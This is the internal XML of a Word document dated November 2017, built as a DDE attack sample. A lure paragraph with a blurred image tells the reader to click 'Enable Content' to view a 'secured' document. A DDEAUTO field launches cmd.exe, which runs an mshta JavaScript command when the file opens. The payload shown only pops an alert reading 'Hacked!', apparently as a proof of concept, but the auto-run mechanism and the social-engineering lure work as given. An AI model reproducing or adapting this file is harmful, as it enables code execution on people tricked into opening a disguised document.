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Pr="00EB289B" w:rsidRDefault="00EB289B" w:rsidP="00EB289B">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="56"/>
          <w:szCs w:val="56"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EB289B">
        <w:rPr>
          <w:sz w:val="56"/>
          <w:szCs w:val="56"/>
        </w:rPr>
        <w:t>The following document has been secured, to view its contents click ‘</w:t>
      </w:r>
      <w:r w:rsidRPr="00EB289B">
        <w:rPr>
          <w:b/>
          <w:sz w:val="56"/>
          <w:szCs w:val="56"/>
        </w:rPr>
        <w:t>Enable Content</w:t>
      </w:r>
      <w:r w:rsidRPr="00EB289B">
        <w:rPr>
          <w:sz w:val="56"/>
          <w:szCs w:val="56"/>
        </w:rPr>
        <w:t>’</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EB289B" w:rsidRDefault="00EB289B">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00EB289B" w:rsidRDefault="00EB289B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62.6pt;height:206.4pt">
            <v:imagedata r:id="rId7" o:title="blurtype"/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EB289B" w:rsidRDefault="00EB289B">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="pt-PT" w:eastAsia="pt-PT"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="13495020" cy="2621280"/>
            <wp:effectExtent l="0" t="0" r="0" b="7620"/>
            <wp:docPr id="1" name="Picture 1" descr="C:\Users\danielteixeira\AppData\Local\Microsoft\Windows\INetCache\Content.Word\blu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teixeira\AppData\Local\Microsoft\Windows\INetCache\Content.Word\blur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5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363421" w:rsidRDefault="004F5714">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> </w:instrText>
      </w:r>
      <w:r w:rsidR="00363421" w:rsidRPr="00363421">
        <w:instrText>DDEAUTO c:\\windows\\system32\\cmd.exe "/c mshta javascript:alert('Hacked!');close();"</w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:noProof/>
        </w:rPr>
        <w:t>!Syntax Error, |</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p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Default="00363421" w:rsidP="00363421"/>
    <w:p w:rsidR="004F5714" w:rsidRPr="00363421" w:rsidRDefault="00363421" w:rsidP="00363421">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="7320"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="004F5714" w:rsidRPr="00363421">
      <w:pgSz w:w="11907" w:h="16840"/>
      <w:pgMar w:top="3175" w:right="1701" w:bottom="2155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81" w:rsidRDefault="00C61C81">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="00C61C81" w:rsidRDefault="00C6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81" w:rsidRDefault="00C61C81">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="00C61C81" w:rsidRDefault="00C6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4"/>
    <w:rsid w:val="002F1091"/>
    <w:rsid w:val="00363421"/>
    <w:rsid w:val="004552C5"/>
    <w:rsid w:val="004C2A70"/>
    <w:rsid w:val="004C6064"/>
    <w:rsid w:val="004F5714"/>
    <w:rsid w:val="005962A6"/>
    <w:rsid w:val="00603C7F"/>
    <w:rsid w:val="00657DDD"/>
    <w:rsid w:val="00666948"/>
    <w:rsid w:val="00822760"/>
    <w:rsid w:val="00B0663F"/>
    <w:rsid w:val="00B23B56"/>
    <w:rsid w:val="00B9798D"/>
    <w:rsid w:val="00C61C81"/>
    <w:rsid w:val="00D874DD"/>
    <w:rsid w:val="00E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D649-AA44-40E6-9145-A83D445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sz w:val="22"/>
      <w:lang w:val="en-US" w:eastAsia="en-US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4F5714"/>
    <w:rPr>
      <w:color w:val="808080"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Hyperlink">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00EB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201</Characters>
  <DocSecurity>4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2017-11-15T12:12:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2017-11-15T12:12:00Z</dcterms:modified>
</cp:coreProperties>
</file>